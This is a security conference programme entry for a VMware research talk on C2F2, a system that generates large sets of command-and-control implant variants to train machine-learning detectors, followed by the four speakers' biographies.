Thursday 5 October 16:00 - 16:30, Red room
Sebastiano Mariani, Oleg Boyarchuk, Stefano Ortolani & Giovanni Vigna (VMware)
Command-and-control (C2) frameworks are used to remotely manage and maintain access to compromised devices. C2 frameworks are routinely used for legitimate penetration testing with the goal of helping organizations improve their defences and better protect against real-world attacks.
To simulate the polymorphic nature of modern threats, C2 frameworks often support the creation of custom payloads that can be used to simulate specific types of attacks. These payloads can be used to test the effectiveness of endpoint security products, network-based intrusion detection systems, and other types of security measures.
Unsurprisingly, cybercriminals immediately took advantage of the opportunity to use effective and well-maintained implants and their management tools for malicious purposes, especially because custom implants can be generated for each attack. As a result, frameworks such as Cobalt Strike, Metasploit and Sliver have increasingly been used in the process of breaching enterprise networks.
This talk introduces a novel approach to detecting C2 implants at scale, which uses the customization techniques implemented by the C2 frameworks as a means to support effective detection. In particular, we developed a “framework for the analysis of C2 frameworks”, called C2F2, that leverages the ability of C2 frameworks to generate custom implants to automatically synthesize large datasets of implants, which are then used to derive detection procedures based on machine learning techniques.
We present a comprehensive analysis of all the implants generated by 10 of the most widely used C2 frameworks (both commercial and open source). For each framework, we detail all possible configuration options, and how they can be used to morph the binary footprint of an implant. We then describe our automated implant-generation harness, which allows for the programmatic generation of thousands of variations of C2 implants, creating datasets suitable for the application of machine learning techniques. Finally, we present the result of our detection procedure, which show that it is indeed possible not only to detect the implants with high precision but also to determine to which C2 framework they belong, supporting improved threat intelligence.
As addenda to this talk, we release C2F2 on GitHub and provide enough plug-ins to instrument all the C2 frameworks mentioned in this presentation. Each plug-in is also paired with enough instructions on how to programmatically explore a large space of possible configuration options when generating the implants. We also provide sample datasets of implants for each analysed C2 framework.
Sebastiano Mariani is a threat researcher at VMware with a keen interest in developing custom tools and infrastructure to aid security researchers in their work. He also enjoys malware analysis and reverse engineering. Previously, he worked as a researcher in Seclab at the University of California, Santa Barbara. He has presented his work at a variety of industry and academic conferences, including Black Hat, ICSE and DIMVA.
Oleg Boyarchuk is a threat researcher at VMware. Oleg is passionate about malware, vulnerabilities, reverse engineering, and Windows internals. Prior to joining VMware he worked as a reverse engineer at Lastline, where he was responsible for malware research and detection improvements. Before that he worked as a kernel driver developer at Avira, developing the core functionality of Avira Antivirus.
Stefano Ortolani is Threat Research Lead at VMware, formerly Director of Threat Research at Lastline, where he started in 2015 as a security researcher. In his current role, Stefano focuses on finding novel approaches to investigate, classify and detect unknown cyber tradecraft. Prior to Lastline, he was part of the Global Research and Analysis Team at Kaspersky Lab, in charge of fostering operations with CERTs, governments, universities and law enforcement agencies, as well as conducting research into the global threat landscape. He received his Ph.D. in computer science from VU University Amsterdam. Stefano is a regular speaker at technical conferences and has authored/co-authored numerous research papers presented at venues such as Virus Bulletin, Security Analyst Summit, Underground Economy and Black Hat.
Giovanni Vigna is the Sr. Director of Threat Intelligence at VMware. He is also a professor in the Department of Computer Science at the University of California in Santa Barbara. His research interests include malware analysis, vulnerability assessment, the underground economy, binary analysis, web security, and the applications of machine learning to security problems. Giovanni is also the founder of the Shellphish hacking group, which has participated in more DEF CON CTF competitions than any other group in history. He is an IEEE Fellow and an ACM Fellow.